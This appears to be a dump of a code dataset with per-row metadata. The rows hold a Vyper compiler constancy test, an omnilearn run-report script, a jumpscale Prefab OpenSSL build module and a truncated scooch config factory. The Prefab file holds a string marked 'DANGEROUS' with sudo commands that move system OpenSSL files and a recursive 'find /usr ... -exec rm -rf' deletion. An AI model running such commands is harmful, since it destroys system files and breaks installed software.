max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
|---|---|---|---|---|---|---|---|---|---|---|
tests/parser/exceptions/test_constancy_exception.py
|
upgradvisor/vyper
| 1,347
|
6628051
|
import pytest
from pytest import raises
from vyper import compiler
from vyper.exceptions import ImmutableViolation, StateAccessViolation
# Each contract below performs a state modification (storage write, send,
# selfdestruct, value-bearing raw_call / create_forwarder_to, or a call to a
# state-modifying internal function) from a @view context, or uses a
# non-constant expression where constancy is required. Compilation must raise
# StateAccessViolation for every one of them.
# NOTE(review): indentation inside the Vyper snippets was stripped by
# extraction and has been reconstructed; Vyper is indentation-sensitive.
@pytest.mark.parametrize(
    "bad_code",
    [
        """
x: int128
@external
@view
def foo() -> int128:
    self.x = 5
    return 1""",
        """
@external
@view
def foo() -> int128:
    send(0x1234567890123456789012345678901234567890, 5)
    return 1""",
        """
@external
@view
def foo():
    selfdestruct(0x1234567890123456789012345678901234567890)""",
        """
x: int128
y: int128
@external
@view
def foo() -> int128:
    self.y = 9
    return 5""",
        """
@external
@view
def foo() -> int128:
    x: Bytes[4] = raw_call(
        0x1234567890123456789012345678901234567890, b"cow", max_outsize=4, gas=595757, value=9
    )
    return 5""",
        """
@external
@view
def foo() -> int128:
    x: address = create_forwarder_to(0x1234567890123456789012345678901234567890, value=9)
    return 5""",
        # test constancy in range expressions
        """
glob: int128
@internal
def foo() -> int128:
    self.glob += 1
    return 5
@external
def bar():
    for i in range(self.foo(), self.foo() + 1):
        pass""",
        """
glob: int128
@internal
def foo() -> int128:
    self.glob += 1
    return 5
@external
def bar():
    for i in [1,2,3,4,self.foo()]:
        pass""",
        """
@external
def foo():
    x: int128 = 5
    for i in range(x):
        pass""",
        """
f:int128
@external
def a (x:int128):
    self.f = 100
@view
@external
def b():
    self.a(10)""",
    ],
)
def test_statefulness_violations(bad_code):
    """Each statefulness-violating contract must fail to compile."""
    with raises(StateAccessViolation):
        compiler.compile_code(bad_code)
# Reassigning a calldata argument mutates an immutable value; the compiler
# must reject it with ImmutableViolation.
# NOTE(review): indentation inside the Vyper snippet was stripped by
# extraction and has been reconstructed; Vyper is indentation-sensitive.
@pytest.mark.parametrize(
    "bad_code",
    [
        """
@external
def foo(x: int128):
    x = 5""",
    ],
)
def test_immutability_violations(bad_code):
    """Each immutability-violating contract must fail to compile."""
    with raises(ImmutableViolation):
        compiler.compile_code(bad_code)
|
import pytest
from pytest import raises
from vyper import compiler
from vyper.exceptions import ImmutableViolation, StateAccessViolation
# Each contract below performs a state modification (storage write, send,
# selfdestruct, value-bearing raw_call / create_forwarder_to, or a call to a
# state-modifying internal function) from a @view context, or uses a
# non-constant expression where constancy is required. Compilation must raise
# StateAccessViolation for every one of them.
# NOTE(review): indentation inside the Vyper snippets was stripped by
# extraction and has been reconstructed; Vyper is indentation-sensitive.
@pytest.mark.parametrize(
    "bad_code",
    [
        """
x: int128
@external
@view
def foo() -> int128:
    self.x = 5
    return 1""",
        """
@external
@view
def foo() -> int128:
    send(0x1234567890123456789012345678901234567890, 5)
    return 1""",
        """
@external
@view
def foo():
    selfdestruct(0x1234567890123456789012345678901234567890)""",
        """
x: int128
y: int128
@external
@view
def foo() -> int128:
    self.y = 9
    return 5""",
        """
@external
@view
def foo() -> int128:
    x: Bytes[4] = raw_call(
        0x1234567890123456789012345678901234567890, b"cow", max_outsize=4, gas=595757, value=9
    )
    return 5""",
        """
@external
@view
def foo() -> int128:
    x: address = create_forwarder_to(0x1234567890123456789012345678901234567890, value=9)
    return 5""",
        # test constancy in range expressions
        """
glob: int128
@internal
def foo() -> int128:
    self.glob += 1
    return 5
@external
def bar():
    for i in range(self.foo(), self.foo() + 1):
        pass""",
        """
glob: int128
@internal
def foo() -> int128:
    self.glob += 1
    return 5
@external
def bar():
    for i in [1,2,3,4,self.foo()]:
        pass""",
        """
@external
def foo():
    x: int128 = 5
    for i in range(x):
        pass""",
        """
f:int128
@external
def a (x:int128):
    self.f = 100
@view
@external
def b():
    self.a(10)""",
    ],
)
def test_statefulness_violations(bad_code):
    """Each statefulness-violating contract must fail to compile."""
    with raises(StateAccessViolation):
        compiler.compile_code(bad_code)
# Reassigning a calldata argument mutates an immutable value; the compiler
# must reject it with ImmutableViolation.
# NOTE(review): indentation inside the Vyper snippet was stripped by
# extraction and has been reconstructed; Vyper is indentation-sensitive.
@pytest.mark.parametrize(
    "bad_code",
    [
        """
@external
def foo(x: int128):
    x = 5""",
    ],
)
def test_immutability_violations(bad_code):
    """Each immutability-violating contract must fail to compile."""
    with raises(ImmutableViolation):
        compiler.compile_code(bad_code)
|
en
| 0.476243
|
x: int128 @external @view def foo() -> int128: self.x = 5 return 1 @external @view def foo() -> int128: send(0x1234567890123456789012345678901234567890, 5) return 1 @external @view def foo(): selfdestruct(0x1234567890123456789012345678901234567890) x: int128 y: int128 @external @view def foo() -> int128: self.y = 9 return 5 @external @view def foo() -> int128: x: Bytes[4] = raw_call( 0x1234567890123456789012345678901234567890, b"cow", max_outsize=4, gas=595757, value=9 ) return 5 @external @view def foo() -> int128: x: address = create_forwarder_to(0x1234567890123456789012345678901234567890, value=9) return 5 # test constancy in range expressions glob: int128 @internal def foo() -> int128: self.glob += 1 return 5 @external def bar(): for i in range(self.foo(), self.foo() + 1): pass glob: int128 @internal def foo() -> int128: self.glob += 1 return 5 @external def bar(): for i in [1,2,3,4,self.foo()]: pass @external def foo(): x: int128 = 5 for i in range(x): pass f:int128 @external def a (x:int128): self.f = 100 @view @external def b(): self.a(10) @external def foo(x: int128): x = 5
| 2.366375
| 2
|
omnilearn/op/report.py
|
GiuliaLanzillotta/omni-learn
| 0
|
6628052
|
import sys, os
try:
from tqdm import tqdm
except ImportError:
tqdm = None
from tabulate import tabulate
import humpack as hp
import omnifig as fig
FD_PATH = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
DEFAULT_SAVE_PATH = os.path.join(os.path.dirname(FD_PATH), 'trained_nets')
def collect_info(run):
    """Attach a summary ``info`` dict to *run* (mutates ``run.info`` in place).

    Collected fields: the configured step limit (``end``), the run timestamp
    (``date``), total training steps (``steps``), and the most recent
    validation loss average, or ``None`` when no validation stats exist.

    Args:
        run: loaded run object exposing ``A`` (config mapping) and
            ``records`` (training-records mapping).
    """
    stats = run.records['stats']
    # Guard the chained lookup: 'val' may be absent or empty, and the last
    # entry may lack a 'loss' record.
    # NOTE(review): the original tested ``'loss' in stats['val']`` —
    # membership in the *list* of stat dicts, which is always False for a
    # string key — so val_loss was unconditionally None. The intended check
    # is against the last entry, stats['val'][-1].
    has_val_loss = (
        'val' in stats
        and len(stats['val'])
        and 'loss' in stats['val'][-1]
    )
    info = {
        'end': run.A['training']['step_limit'],
        'date': run.records['timestamp'],
        'steps': run.records['total_steps'],
        'val_loss': stats['val'][-1]['loss']['avg'] if has_val_loss else None,
    }
    run.info = info
# @fig.Script('report', description='compile a report of past runs')
def get_report(A):
    """Load all saved runs under the save root and return them newest-first.

    Args:
        A: omnifig config node (provides ``pull``/``push``/``silenced``) —
            assumed; confirm against callers. Recognized keys: ``saveroot``
            (alias ``root``), ``pbar``, ``run_type``, ``limit``.

    Returns:
        list - runs sorted by ``info['date']`` descending, truncated to
        ``limit`` entries when ``limit`` is set.

    Raises:
        Exception: if no save root can be resolved.
    """
    root = A.pull('saveroot', '<>root', None)
    if root is None:
        # Fall back to the env var, then the package-relative default.
        root = os.environ.get('OMNILEARN_SAVE_DIR', DEFAULT_SAVE_PATH)
    if root is None:
        raise Exception('no saveroot found')
    pbar = A.pull('pbar', True)
    if tqdm is None:
        pbar = None  # tqdm unavailable: silently disable the progress bar
    names = os.listdir(root)
    # region Load Runs
    A.push('silent', True, overwrite=False)
    A.push('_type', A.pull('run_type', 'run'), overwrite=False)
    runs = hp.Table()
    print(f'Found {len(names)} runs')
    itr = tqdm(names) if pbar else iter(names)
    with A.silenced():
        for name in itr:
            # Each run gets a fresh config seeded from A plus its own path.
            C = fig.get_config()
            C.update(A)
            C.push('path', os.path.join(root, name))
            run = C.pull_self()
            runs.append(run)
    # endregion
    runs.map(collect_info)
    # Newest runs first.
    runs = sorted(runs, key=lambda run: run.info['date'], reverse=True)
    limit = A.pull('limit', None)
    if limit is not None:
        runs = runs[:limit]
    return runs
|
import sys, os
try:
from tqdm import tqdm
except ImportError:
tqdm = None
from tabulate import tabulate
import humpack as hp
import omnifig as fig
FD_PATH = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
DEFAULT_SAVE_PATH = os.path.join(os.path.dirname(FD_PATH), 'trained_nets')
def collect_info(run):
    """Attach a summary ``info`` dict to *run* (mutates ``run.info`` in place).

    Collected fields: the configured step limit (``end``), the run timestamp
    (``date``), total training steps (``steps``), and the most recent
    validation loss average, or ``None`` when no validation stats exist.

    Args:
        run: loaded run object exposing ``A`` (config mapping) and
            ``records`` (training-records mapping).
    """
    stats = run.records['stats']
    # Guard the chained lookup: 'val' may be absent or empty, and the last
    # entry may lack a 'loss' record.
    # NOTE(review): the original tested ``'loss' in stats['val']`` —
    # membership in the *list* of stat dicts, which is always False for a
    # string key — so val_loss was unconditionally None. The intended check
    # is against the last entry, stats['val'][-1].
    has_val_loss = (
        'val' in stats
        and len(stats['val'])
        and 'loss' in stats['val'][-1]
    )
    info = {
        'end': run.A['training']['step_limit'],
        'date': run.records['timestamp'],
        'steps': run.records['total_steps'],
        'val_loss': stats['val'][-1]['loss']['avg'] if has_val_loss else None,
    }
    run.info = info
# @fig.Script('report', description='compile a report of past runs')
def get_report(A):
    """Load all saved runs under the save root and return them newest-first.

    Args:
        A: omnifig config node (provides ``pull``/``push``/``silenced``) —
            assumed; confirm against callers. Recognized keys: ``saveroot``
            (alias ``root``), ``pbar``, ``run_type``, ``limit``.

    Returns:
        list - runs sorted by ``info['date']`` descending, truncated to
        ``limit`` entries when ``limit`` is set.

    Raises:
        Exception: if no save root can be resolved.
    """
    root = A.pull('saveroot', '<>root', None)
    if root is None:
        # Fall back to the env var, then the package-relative default.
        root = os.environ.get('OMNILEARN_SAVE_DIR', DEFAULT_SAVE_PATH)
    if root is None:
        raise Exception('no saveroot found')
    pbar = A.pull('pbar', True)
    if tqdm is None:
        pbar = None  # tqdm unavailable: silently disable the progress bar
    names = os.listdir(root)
    # region Load Runs
    A.push('silent', True, overwrite=False)
    A.push('_type', A.pull('run_type', 'run'), overwrite=False)
    runs = hp.Table()
    print(f'Found {len(names)} runs')
    itr = tqdm(names) if pbar else iter(names)
    with A.silenced():
        for name in itr:
            # Each run gets a fresh config seeded from A plus its own path.
            C = fig.get_config()
            C.update(A)
            C.push('path', os.path.join(root, name))
            run = C.pull_self()
            runs.append(run)
    # endregion
    runs.map(collect_info)
    # Newest runs first.
    runs = sorted(runs, key=lambda run: run.info['date'], reverse=True)
    limit = A.pull('limit', None)
    if limit is not None:
        runs = runs[:limit]
    return runs
|
en
| 0.439492
|
# for k,v in info.items(): # setattr(run, k, v) # return info # # @fig.Script('report', description='compile a report of past runs') # print(root) # region Load Runs # endregion
| 2.110175
| 2
|
modules/lib/PrefabOpenSSL.py
|
threefoldtech/jumpscale_prefab9
| 0
|
6628053
|
from jumpscale import j
base = j.tools.prefab._getBaseClass()
# DANGEROUS
# HIDE OPENSSL
"""
sudo mv -f /usr/local/etc/openssl /usr/local/etc/openssl_
sudo mv -f /usr/local/Cellar/openssl /usr/local/Cellar/openssl_
sudo mv -f /usr/local/include/node/openssl /usr/local/include/node/openssl_
sudo mv -f /usr/local/include/openssl /usr/local/include/openssl_
sudo mv -f /usr/local/opt/openssl /usr/local/opt/openssl_
sudo mv -f /usr/local/ssl /usr/local/ssl_
sudo mv -f /usr/local/bin/openssl /usr/local/bin/openssl_
sudo mv -f /usr/bin/openssl /usr/bin/openssl_
find /usr -name "*openssl*" -exec rm -rf {} \;
"""
# UNHIDE OPENSSL
"""
sudo mv -f /usr/local/etc/openssl_ /usr/local/etc/openssl
sudo mv -f /usr/local/Cellar/openssl_ /usr/local/Cellar/openssl
sudo mv -f /usr/local/include/node/openssl_ /usr/local/include/node/openssl
sudo mv -f /usr/local/include/openssl_ /usr/local/include/openssl
sudo mv -f /usr/local/opt/openssl_ /usr/local/opt/openssl
sudo mv -f /usr/local/ssl_ /usr/local/ssl
sudo mv -f /usr/local/bin/openssl_ /usr/local/bin/openssl
sudo mv -f /usr/bin/openssl_ /usr/bin/openssl
"""
class PrefabOpenSSL(base):
    """Prefab module that clones and builds OpenSSL 1.1.0 from source."""

    def _init(self):
        # Build artifacts and the git checkout live under the prefab $BUILDDIR.
        self.BUILDDIRL = self.core.replace("$BUILDDIR/openssl")
        self.CODEDIRL = self.core.replace("$BUILDDIR/code/openssl")

    def reset(self):
        """Remove the build and source directories so build() starts clean."""
        base.reset(self)
        self.core.dir_remove(self.BUILDDIRL)
        self.core.dir_remove(self.CODEDIRL)

    def build(self, reset=False):
        """Clone and compile OpenSSL (branch OpenSSL_1_1_0-stable).

        js_shell 'j.tools.prefab.local.lib.openssl.build();print(j.tools.prefab.local.lib.openssl.BUILDDIRL)'

        Args:
            reset: bool - rebuild even if a previous build was recorded.
        """
        if self.doneCheck("build") and not reset:
            return
        self.prefab.system.base.development(python=False)
        url = "https://github.com/openssl/openssl.git"
        self.prefab.tools.git.pullRepo(url, branch="OpenSSL_1_1_0-stable", dest=self.CODEDIRL, reset=False, ssh=False)
        if not self.doneGet("compile") or reset:
            # $BUILDDIRL / $CODEDIRL are substituted by self.replace() below;
            # $target is swapped in per-platform before the script is written.
            C = """
set -ex
mkdir -p $BUILDDIRL
cd $CODEDIRL
# ./config
./Configure $target shared enable-ec_nistp_64_gcc_128 no-ssl2 no-ssl3 no-comp --openssldir=$BUILDDIRL --prefix=$BUILDDIRL
make depend
make install
rm -rf $BUILDDIRL/share
rm -rf $BUILDDIRL/private
echo "**BUILD DONE**"
"""
            if self.prefab.core.isMac:
                C = C.replace("$target", "darwin64-x86_64-cc")
            else:
                C = C.replace("$target", "linux-generic64")
            self.prefab.core.file_write("%s/mycompile_all.sh" % self.CODEDIRL, self.replace(C))
            self.logger.info("compile openssl")
            self.logger.debug(C)
            self.prefab.core.run("sh %s/mycompile_all.sh" % self.CODEDIRL)
            self.doneSet("compile")
            self.logger.info("BUILD DONE")
        else:
            self.logger.info("NO NEED TO BUILD")
        self.logger.info("BUILD COMPLETED OK")
        self.doneSet("build")
|
from jumpscale import j
base = j.tools.prefab._getBaseClass()
# DANGEROUS
# HIDE OPENSSL
"""
sudo mv -f /usr/local/etc/openssl /usr/local/etc/openssl_
sudo mv -f /usr/local/Cellar/openssl /usr/local/Cellar/openssl_
sudo mv -f /usr/local/include/node/openssl /usr/local/include/node/openssl_
sudo mv -f /usr/local/include/openssl /usr/local/include/openssl_
sudo mv -f /usr/local/opt/openssl /usr/local/opt/openssl_
sudo mv -f /usr/local/ssl /usr/local/ssl_
sudo mv -f /usr/local/bin/openssl /usr/local/bin/openssl_
sudo mv -f /usr/bin/openssl /usr/bin/openssl_
find /usr -name "*openssl*" -exec rm -rf {} \;
"""
# UNHIDE OPENSSL
"""
sudo mv -f /usr/local/etc/openssl_ /usr/local/etc/openssl
sudo mv -f /usr/local/Cellar/openssl_ /usr/local/Cellar/openssl
sudo mv -f /usr/local/include/node/openssl_ /usr/local/include/node/openssl
sudo mv -f /usr/local/include/openssl_ /usr/local/include/openssl
sudo mv -f /usr/local/opt/openssl_ /usr/local/opt/openssl
sudo mv -f /usr/local/ssl_ /usr/local/ssl
sudo mv -f /usr/local/bin/openssl_ /usr/local/bin/openssl
sudo mv -f /usr/bin/openssl_ /usr/bin/openssl
"""
class PrefabOpenSSL(base):
    """Prefab module that clones and builds OpenSSL 1.1.0 from source."""

    def _init(self):
        # Build artifacts and the git checkout live under the prefab $BUILDDIR.
        self.BUILDDIRL = self.core.replace("$BUILDDIR/openssl")
        self.CODEDIRL = self.core.replace("$BUILDDIR/code/openssl")

    def reset(self):
        """Remove the build and source directories so build() starts clean."""
        base.reset(self)
        self.core.dir_remove(self.BUILDDIRL)
        self.core.dir_remove(self.CODEDIRL)

    def build(self, reset=False):
        """Clone and compile OpenSSL (branch OpenSSL_1_1_0-stable).

        js_shell 'j.tools.prefab.local.lib.openssl.build();print(j.tools.prefab.local.lib.openssl.BUILDDIRL)'

        Args:
            reset: bool - rebuild even if a previous build was recorded.
        """
        if self.doneCheck("build") and not reset:
            return
        self.prefab.system.base.development(python=False)
        url = "https://github.com/openssl/openssl.git"
        self.prefab.tools.git.pullRepo(url, branch="OpenSSL_1_1_0-stable", dest=self.CODEDIRL, reset=False, ssh=False)
        if not self.doneGet("compile") or reset:
            # $BUILDDIRL / $CODEDIRL are substituted by self.replace() below;
            # $target is swapped in per-platform before the script is written.
            C = """
set -ex
mkdir -p $BUILDDIRL
cd $CODEDIRL
# ./config
./Configure $target shared enable-ec_nistp_64_gcc_128 no-ssl2 no-ssl3 no-comp --openssldir=$BUILDDIRL --prefix=$BUILDDIRL
make depend
make install
rm -rf $BUILDDIRL/share
rm -rf $BUILDDIRL/private
echo "**BUILD DONE**"
"""
            if self.prefab.core.isMac:
                C = C.replace("$target", "darwin64-x86_64-cc")
            else:
                C = C.replace("$target", "linux-generic64")
            self.prefab.core.file_write("%s/mycompile_all.sh" % self.CODEDIRL, self.replace(C))
            self.logger.info("compile openssl")
            self.logger.debug(C)
            self.prefab.core.run("sh %s/mycompile_all.sh" % self.CODEDIRL)
            self.doneSet("compile")
            self.logger.info("BUILD DONE")
        else:
            self.logger.info("NO NEED TO BUILD")
        self.logger.info("BUILD COMPLETED OK")
        self.doneSet("build")
|
en
| 0.259497
|
# DANGEROUS # HIDE OPENSSL sudo mv -f /usr/local/etc/openssl /usr/local/etc/openssl_ sudo mv -f /usr/local/Cellar/openssl /usr/local/Cellar/openssl_ sudo mv -f /usr/local/include/node/openssl /usr/local/include/node/openssl_ sudo mv -f /usr/local/include/openssl /usr/local/include/openssl_ sudo mv -f /usr/local/opt/openssl /usr/local/opt/openssl_ sudo mv -f /usr/local/ssl /usr/local/ssl_ sudo mv -f /usr/local/bin/openssl /usr/local/bin/openssl_ sudo mv -f /usr/bin/openssl /usr/bin/openssl_ find /usr -name "*openssl*" -exec rm -rf {} \; # UNHIDE OPENSSL sudo mv -f /usr/local/etc/openssl_ /usr/local/etc/openssl sudo mv -f /usr/local/Cellar/openssl_ /usr/local/Cellar/openssl sudo mv -f /usr/local/include/node/openssl_ /usr/local/include/node/openssl sudo mv -f /usr/local/include/openssl_ /usr/local/include/openssl sudo mv -f /usr/local/opt/openssl_ /usr/local/opt/openssl sudo mv -f /usr/local/ssl_ /usr/local/ssl sudo mv -f /usr/local/bin/openssl_ /usr/local/bin/openssl sudo mv -f /usr/bin/openssl_ /usr/bin/openssl js_shell 'j.tools.prefab.local.lib.openssl.build();print(j.tools.prefab.local.lib.openssl.BUILDDIRL)' set -ex mkdir -p $BUILDDIRL cd $CODEDIRL # ./config ./Configure $target shared enable-ec_nistp_64_gcc_128 no-ssl2 no-ssl3 no-comp --openssldir=$BUILDDIRL --prefix=$BUILDDIRL make depend make install rm -rf $BUILDDIRL/share rm -rf $BUILDDIRL/private echo "**BUILD DONE**"
| 1.883569
| 2
|
scooch/config_factory.py
|
PandoraMedia/scooch
| 6
|
6628054
|
<filename>scooch/config_factory.py
# coding=utf-8
# Copyright 2021 Pandora Media, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Python standard library imports
import re
import textwrap
# Third party imports
from ruamel.yaml.comments import CommentedMap
# Local imports
from .config_list import ConfigList
from .config_collection import ConfigCollection
class ConfigFactory(object):
    """
    A class for making configurations for class hierarchies out of the box.

    Indentation was stripped from this block by extraction and has been
    reconstructed from the control-flow logic; hedged NOTE(review) comments
    mark the spots where the original nesting is ambiguous.
    """

    def __init__(self, interactive) -> None:
        """
        **Constructor**

        Args:
            interactive: bool - Whether to prompt user for input when constructing a configuration.
        """
        super().__init__()
        self._interactive = interactive

    def create_config(self, cls, level=0):
        """
        Generates a configuration for this configurable, with all default values filled out,
        comments in place, and sub-configurables selected by the user (or placeholders are
        inserted).

        Args:
            cls: Configurable - A Configurable class to construct a configuration for.
            level: int - How many layers deep in a configuration heirarchy we are. This can help with
                printing prompts in interactive mode.

        Returns:
            Config - The constructed configurable with placeholders where no defaults exist.
        """
        config = CommentedMap()
        if self._interactive:
            print(textwrap.indent(f'===\nConfiguring Configurable: {cls.__name__}\n===\n', ' '*level))
        # Add defaults
        config.update(cls.__PARAM_DEFAULTS__)
        # Add configurables
        for param, cfgrble_type in cls.__CONFIGURABLES__.items():
            docs = cls.__PARAMS__[param]
            config[param] = self._populate_config(cfgrble_type, docs, level+1)
        # Add required parameters and comments
        for ky, val in cls.__PARAMS__.items():
            if ky not in config.keys():
                # A doc of the form "<type>" names the expected type; reuse a
                # single match (the original matched the same pattern twice)
                # and use raw strings to avoid invalid-escape warnings.
                type_match = re.match(r"\<([^>]+)\>", val)
                if type_match:
                    config[ky] = f'<{type_match.group(1)}>'
                else:
                    config[ky] = '<Unspecified Type>'
            # Annotate every parameter with its doc string as an EOL comment.
            config.yaml_add_eol_comment('<= '+val, ky, 65)
        return {cls.__name__: config}

    def _get_subconfig(self, c_type, docs, level):
        """
        Configure a sub configurable configuration, optionally with user prompts for types.

        Args:
            c_type: Configurable - The Configurable to have a configuration constructed for.
            docs: str - The docs to print out in user prompts to explain the config purpose to
                the user.
            level: int - How many layers deep in a configuration heirarchy we are. This can
                help with printing prompts in interactive mode.

        Returns:
            dict - A dictionary containing the constructed configuration
        """
        formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
        subclss = c_type._all_subclasses()
        if len(subclss) == 1:
            # Only one concrete subclass: nothing to select.
            return self.create_config(subclss[0], level + 1)
        else:
            if self._interactive:
                inputting = True
                while inputting:
                    subcls_names = [f'{idx}: {subcls.__name__}' for idx, subcls in enumerate(subclss)]
                    print(textwrap.indent(f'Select Subclass for Component of Type "{c_type.__name__}":\n-\n{formatted_docs}\n-\n' + '\n'.join(subcls_names), ' '*level + '+ '))
                    try:
                        selection = int(input(' '*level + '+ '))
                        if selection < 0: raise IndexError # Prevent negative indexing in UI.
                        print(' ')
                        inputting = False
                        return self.create_config(subclss[selection], level + 1)
                    except (ValueError, IndexError):
                        print(textwrap.indent(f'Invalid value, please enter an integer from 0 to {len(subclss)-1}', ' '*level))
                        print(' ')
            else:
                # Non-interactive: leave a placeholder for the user to fill in.
                return {f'<{c_type.__name__}>': None}

    def _unpack_config_list(self, c_type, docs, level):
        """
        Configure a list of sub configurable configurations, optionally with user prompts
        for types.

        Args:
            c_type: Configurable - The Configurable to have a configuration constructed for.
            docs: str - The docs to print out in user prompts to explain the config purpose to
                the user.
            level: int - How many layers deep in a configuration heirarchy we are. This can
                help with printing prompts in interactive mode.

        Returns:
            dict - A dictionary containing the constructed configuration
        """
        formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
        subtype = c_type.subtype
        if type(subtype) in (ConfigList, ConfigCollection):
            subtype_name = subtype.__class__.__name__
        else:
            subtype_name = subtype.__name__
        if self._interactive:
            inputting = True
            while inputting:
                print(textwrap.indent(f'Choose number of elements in Config List of type "{subtype_name}":\n-\n{formatted_docs}\n-', ' '*level + '+ '))
                try:
                    number_elem = int(input(' '*level + '+ '))
                    if number_elem < 0: raise ValueError
                    print(' ')
                    inputting = False
                except ValueError:
                    print(textwrap.indent(f'Invalid value, please enter a positive integer', ' '*level))
                    print(' ')
            # number_elem is only bound once a valid count was entered, so the
            # list construction must stay inside the interactive branch.
            cfg = []
            for _ in range(number_elem):
                if type(subtype) not in (ConfigList, ConfigCollection):
                    docs = ''
                cfg += [self._populate_config(subtype, docs, level+1)]
            return cfg
        # NOTE(review): no non-interactive branch is visible in the original;
        # non-interactive mode falls through and returns None — confirm.

    def _unpack_config_collection(self, c_type, docs, level):
        """
        Configure a collection of sub configurable configurations, optionally with user prompts
        for types.

        Args:
            c_type: ConfigCollection - The Configurable Collection to have a configuration constructed for.
            docs: str - The docs to print out in user prompts to explain the config purpose to
                the user.
            level: int - How many layers deep in a configuration heirarchy we are. This can
                help with printing prompts in interactive mode.

        Returns:
            dict - A dictionary containing the constructed configuration
        """
        formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
        subtype = c_type.subtype
        if type(subtype) in (ConfigList, ConfigCollection):
            subtype_name = subtype.__class__.__name__
        else:
            subtype_name = subtype.__name__
        if self._interactive:
            inputting = True
            cfg = {}
            while inputting:
                print(textwrap.indent(f'Creating a collection of type "{subtype_name}":\n-\n{formatted_docs}\n-', ' '*level + '+ '))
                print(textwrap.indent(f'Choose a name for an element in collection of type "{subtype_name}", \nor press enter to finish generating this collection:', ' '*level + '+ '))
                name = input(' '*level + '+ ')
                print(' ')
                if len(name) == 0 or name.isspace():
                    # Blank name terminates collection entry.
                    inputting = False
                else:
                    if type(subtype) not in (ConfigList, ConfigCollection):
                        docs = ''
                    cfg[name] = self._populate_config(subtype, docs, level+1)
            return cfg
        # NOTE(review): no non-interactive branch is visible in the original;
        # non-interactive mode falls through and returns None — confirm.

    def _populate_config(self, cfgrble_type, docs, lvl):
        """
        A hub function to distribute the configuration construction to the correct handler, based on the type
        of configuration required.

        Args:
            cfgrble_type: (Configurable, ConfigList, or ConfigCollection) - A type of configuration to be constructed.
            docs: str - The docs describing the configuration to be constructed.
            lvl: int - How deep in a configuration heirarchy we are - useful for pretty printing user prompts.

        Returns:
            The configuration produced by the matching handler.
        """
        if type(cfgrble_type) is ConfigList:
            value = self._unpack_config_list(cfgrble_type, docs, lvl)
        elif type(cfgrble_type) is ConfigCollection:
            value = self._unpack_config_collection(cfgrble_type, docs, lvl)
        else:
            value = self._get_subconfig(cfgrble_type, docs, lvl)
        return value
|
<filename>scooch/config_factory.py
# coding=utf-8
# Copyright 2021 Pandora Media, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Python standard library imports
import re
import textwrap
# Third party imports
from ruamel.yaml.comments import CommentedMap
# Local imports
from .config_list import ConfigList
from .config_collection import ConfigCollection
class ConfigFactory(object):
    """
    A class for making configurations for class hierarchies out of the box.

    Indentation was stripped from this block by extraction and has been
    reconstructed from the control-flow logic; hedged NOTE(review) comments
    mark the spots where the original nesting is ambiguous.
    """

    def __init__(self, interactive) -> None:
        """
        **Constructor**

        Args:
            interactive: bool - Whether to prompt user for input when constructing a configuration.
        """
        super().__init__()
        self._interactive = interactive

    def create_config(self, cls, level=0):
        """
        Generates a configuration for this configurable, with all default values filled out,
        comments in place, and sub-configurables selected by the user (or placeholders are
        inserted).

        Args:
            cls: Configurable - A Configurable class to construct a configuration for.
            level: int - How many layers deep in a configuration heirarchy we are. This can help with
                printing prompts in interactive mode.

        Returns:
            Config - The constructed configurable with placeholders where no defaults exist.
        """
        config = CommentedMap()
        if self._interactive:
            print(textwrap.indent(f'===\nConfiguring Configurable: {cls.__name__}\n===\n', ' '*level))
        # Add defaults
        config.update(cls.__PARAM_DEFAULTS__)
        # Add configurables
        for param, cfgrble_type in cls.__CONFIGURABLES__.items():
            docs = cls.__PARAMS__[param]
            config[param] = self._populate_config(cfgrble_type, docs, level+1)
        # Add required parameters and comments
        for ky, val in cls.__PARAMS__.items():
            if ky not in config.keys():
                # A doc of the form "<type>" names the expected type; reuse a
                # single match (the original matched the same pattern twice)
                # and use raw strings to avoid invalid-escape warnings.
                type_match = re.match(r"\<([^>]+)\>", val)
                if type_match:
                    config[ky] = f'<{type_match.group(1)}>'
                else:
                    config[ky] = '<Unspecified Type>'
            # Annotate every parameter with its doc string as an EOL comment.
            config.yaml_add_eol_comment('<= '+val, ky, 65)
        return {cls.__name__: config}

    def _get_subconfig(self, c_type, docs, level):
        """
        Configure a sub configurable configuration, optionally with user prompts for types.

        Args:
            c_type: Configurable - The Configurable to have a configuration constructed for.
            docs: str - The docs to print out in user prompts to explain the config purpose to
                the user.
            level: int - How many layers deep in a configuration heirarchy we are. This can
                help with printing prompts in interactive mode.

        Returns:
            dict - A dictionary containing the constructed configuration
        """
        formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
        subclss = c_type._all_subclasses()
        if len(subclss) == 1:
            # Only one concrete subclass: nothing to select.
            return self.create_config(subclss[0], level + 1)
        else:
            if self._interactive:
                inputting = True
                while inputting:
                    subcls_names = [f'{idx}: {subcls.__name__}' for idx, subcls in enumerate(subclss)]
                    print(textwrap.indent(f'Select Subclass for Component of Type "{c_type.__name__}":\n-\n{formatted_docs}\n-\n' + '\n'.join(subcls_names), ' '*level + '+ '))
                    try:
                        selection = int(input(' '*level + '+ '))
                        if selection < 0: raise IndexError # Prevent negative indexing in UI.
                        print(' ')
                        inputting = False
